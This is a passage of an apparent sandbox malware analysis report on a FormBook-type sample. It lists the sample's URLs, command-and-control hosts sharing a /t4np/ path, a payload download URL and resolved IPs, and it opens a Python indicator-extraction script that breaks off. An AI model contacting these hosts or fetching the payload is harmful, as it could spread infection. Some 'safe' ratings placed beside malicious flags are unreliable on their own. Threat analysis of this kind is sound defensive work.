http://www.33347.netwww.33347.net | 0% | Avira URL Cloud | safe
http://www.madisoncountylincoln.com/ | 0% | Avira URL Cloud | safe
http://www.mejawajib.shop | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/casamentos/decoracao-de-casamento/ | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/lua-de-mel-2/ | 0% | Avira URL Cloud | safe
https://www.casar.com | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/organizacao/ | 0% | Avira URL Cloud | safe
http://www.funhood.life | 0% | Avira URL Cloud | safe
http://www.brunaeleandro.com | 0% | Avira URL Cloud | safe
http://www.findmyoriginstory.comwww.findmyoriginstory.com | 0% | Avira URL Cloud | safe
http://www.mnsmanagmentsolutions.com | 0% | Avira URL Cloud | safe
http://www.findmyoriginstory.com | 0% | Avira URL Cloud | safe
http://www.sistemadanetflix.site/t4np/ | 0% | Avira URL Cloud | safe
http://www.sistemadanetflix.sitewww.sistemadanetflix.site | 0% | Avira URL Cloud | safe
http://www.babupaul.comwww.babupaul.com | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/noivas/dicas-para-noivas/ | 0% | Avira URL Cloud | safe
http://www.evelycosmetique.com | 0% | Avira URL Cloud | safe
http://www.icste-conference.org | 0% | Avira URL Cloud | safe
http://www.33347.net | 0% | Avira URL Cloud | safe
http://www.rw-bau.comwww.rw-bau.com | 0% | Avira URL Cloud | safe
http://www.mejawajib.shopwww.mejawajib.shop | 0% | Avira URL Cloud | safe
http://www.myprojoints.com | 0% | Avira URL Cloud | safe
http://www.babupaul.com/t4np/ | 0% | Avira URL Cloud | safe
http://www.metatv.app/t4np/ | 0% | Avira URL Cloud | safe
http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== | 0% | Avira URL Cloud | safe
http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 | 0% | Avira URL Cloud | safe
http://www.madisoncountylincoln.com/t4np/ | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/casamentos/casamentos-reais/ | 0% | Avira URL Cloud | safe
http://www.funhood.life/t4np/ | 0% | Avira URL Cloud | safe
http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== | 0% | Avira URL Cloud | safe
http://www.sistemadanetflix.site | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/cha-de-panela/ | 0% | Avira URL Cloud | safe
http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== | 0% | Avira URL Cloud | safe
https://www.casar.com/assunto/noivas/vestidos-de-noiva/ | 0% | Avira URL Cloud | safe
http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 | 0% | Avira URL Cloud | safe
http://www.findmyoriginstory.com/t4np/ | 0% | Avira URL Cloud | safe
https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c | 0% | Avira URL Cloud | safe
http://www.mejawajib.shop/t4np/ | 0% | Avira URL Cloud | safe
http://www.rw-bau.com | 0% | Avira URL Cloud | safe
http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com | 0% | Avira URL Cloud | safe
http://www.madisoncountylincoln.comwww.madisoncountylincoln.com | 0% | Avira URL Cloud | safe
http://www.icste-conference.org/t4np/ | 0% | Avira URL Cloud | safe
http://www.babupaul.com | 0% | Avira URL Cloud | safe
http://www.icste-conference.orgwww.icste-conference.org | 0% | Avira URL Cloud | safe
http://www.mnsmanagmentsolutions.com/t4np/ | 0% | Avira URL Cloud | safe
http://www.groupekoriolis.comwww.groupekoriolis.com | 0% | Avira URL Cloud | safe
http://www.myprojoints.com/t4np/ | 0% | Avira URL Cloud | safe
https://urn.to/r/sds_see5bad | 0% | Avira URL Cloud | safe
http://www.emprendizajesocial.com | 0% | Avira URL Cloud | safe
http://www.emprendizajesocial.comwww.emprendizajesocial.com | 0% | Avira URL Cloud | safe
http://www.metatv.appwww.metatv.app | 0% | Avira URL Cloud | safe
https://ajuda.casar.com | 0% | Avira URL Cloud | safe
http://www.33347.net/t4np/ | 0% | Avira URL Cloud | safe
http://www.brunaeleandro.com/t4np/ | 0% | Avira URL Cloud | safe
http://www.evelycosmetique.com/t4np/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.madisoncountylincoln.com | 172.67.152.24 | true | true | | unknown
a.uguu.se | 188.40.83.211 | true | false | | high
www.funhood.life | 162.213.249.254 | true | false | | unknown
brunaeleandro.com | 54.85.86.211 | true | true | | unknown
www.emprendizajesocial.com | 217.160.0.229 | true | true | | unknown
www.metatv.app | 172.67.194.225 | true | true | | unknown
www.findmyoriginstory.com | 74.208.236.131 | true | true | | unknown
www.brunaeleandro.com | unknown | unknown | true | | unknown
www.myprojoints.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.emprendizajesocial.com/t4np/ | true | Avira URL Cloud: safe | unknown
http://www.metatv.app/t4np/ | true | Avira URL Cloud: safe | unknown
http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== | true | Avira URL Cloud: safe | unknown
http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 | true | Avira URL Cloud: safe | unknown
http://www.madisoncountylincoln.com/t4np/ | true | Avira URL Cloud: safe | unknown
http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== | true | Avira URL Cloud: safe | unknown
http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== | true | Avira URL Cloud: safe | unknown
http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 | true | Avira URL Cloud: safe | unknown
https://a.uguu.se/fwvfviJb.dat | false | | high
http://www.brunaeleandro.com/t4np/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | M61Ae5o9b.8.dr | false | | high
https://duckduckgo.com/ac/?q= | M61Ae5o9b.8.dr | false | | high
http://www.rw-bau.com/t4np/ | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.madisoncountylincoln.com | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.casar.com/assunto/organizacao/ | explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.metatv.app | explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a.uguu.se4Dp | SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.brunaeleandro.comwww.brunaeleandro.com | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.funhood.lifewww.funhood.life | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.casar.com/assunto/casamentos/decoracao-de-casamento/ | explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.evelycosmetique.comwww.evelycosmetique.com | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://search.yahoo.com?fr=crmas_sfpf | M61Ae5o9b.8.dr | false | | high
https://www.newtonsoft.com/json | Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.myprojoints.comwww.myprojoints.com | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.groupekoriolis.com | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.casar.com/assunto/lua-de-mel-2/ | explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.33347.netwww.33347.net | explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                  http://www.groupekoriolis.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.madisoncountylincoln.com/explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.brunaeleandro.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.findmyoriginstory.comwww.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.funhood.lifeexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://embed.typeform.com/embed.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.findmyoriginstory.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sistemadanetflix.site/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.evelycosmetique.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://connect.facebook.net/en_US/fbevents.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.casar.com/assunto/noivas/dicas-para-noivas/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://a.uguu.se/fwvfviJb.dat=SC_0017384.exe, Lvdnyvcvr.exe.0.drfalse
                                        high
                                        http://www.babupaul.comwww.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sistemadanetflix.sitewww.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.pinterest.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.mejawajib.shopwww.mejawajib.shopexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.myprojoints.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.33347.netexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.rw-bau.comwww.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoM61Ae5o9b.8.drfalse
                                                high
                                                http://www.babupaul.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.casar.com/assunto/casamentos/casamentos-reais/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.youtube.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=M61Ae5o9b.8.drfalse
                                                    high
                                                    http://www.funhood.life/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchM61Ae5o9b.8.drfalse
                                                      high
                                                      https://www.casar.com/assunto/cha-de-panela/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sistemadanetflix.siteexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=M61Ae5o9b.8.drfalse
                                                            high
                                                            http://james.newtonking.com/projects/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.casar.com/assunto/noivas/vestidos-de-noiva/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.findmyoriginstory.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=M61Ae5o9b.8.drfalse
                                                              high
                                                              https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137cexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://plus.google.com/explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://search.yahoo.com?fr=crmas_sfpM61Ae5o9b.8.drfalse
                                                                  high
                                                                  http://www.mejawajib.shop/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.madisoncountylincoln.comwww.madisoncountylincoln.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.rw-bau.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.icste-conference.org/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.icste-conference.orgwww.icste-conference.orgexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.babupaul.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.groupekoriolis.comwww.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.newtonsoft.com/jsonschemaLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.mnsmanagmentsolutions.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.myprojoints.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.emprendizajesocial.comwww.emprendizajesocial.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.jsexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://urn.to/r/sds_see5badSC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonSC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.metatv.appwww.metatv.appexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://instagram.com/casarpontocomexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ajuda.casar.comexplorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=M61Ae5o9b.8.drfalse
                                                                            high
                                                                            http://www.33347.net/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.evelycosmetique.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
54.85.86.211 | brunaeleandro.com | United States | 14618 | AMAZON-AESUS | true
172.67.152.24 | www.madisoncountylincoln.com | United States | 13335 | CLOUDFLARENETUS | true
74.208.236.131 | www.findmyoriginstory.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
217.160.0.229 | www.emprendizajesocial.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
172.67.194.225 | www.metatv.app | United States | 13335 | CLOUDFLARENETUS | true
188.40.83.211 | a.uguu.se | Germany | 24940 | HETZNER-ASDE | false

Private IP
192.168.2.1
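The URL table above mixes harmless browser, library and web-page strings with a set of hosts that all carry the same short path, /t4np/. FormBook embeds one such path together with a list of hosts (the live C2 plus decoys) in its configuration, so the hosts sharing that path are the indicators worth extracting, and the IP table shows which of them the sandbox actually resolved. The Python script below is an added example, not part of the Joe Sandbox report: it recovers the fused columns of the flattened rows, groups hosts by campaign path, and joins the result with the resolved-IP table. The SOURCE_NAMES list, the four-character path pattern, and the embedded sample rows and IP map are assumptions constructed from this report and would need adjusting for another analysis.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: rows copied from this report's URL table as they appear
# after extraction, i.e. URL, Source (process name plus memory-dump id) and the
# Malicious flag ("false") are run together with no separator.
SAMPLE_ROWS = [
    "http://www.groupekoriolis.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.groupekoriolis.comwww.groupekoriolis.comexplorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.babupaul.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse",
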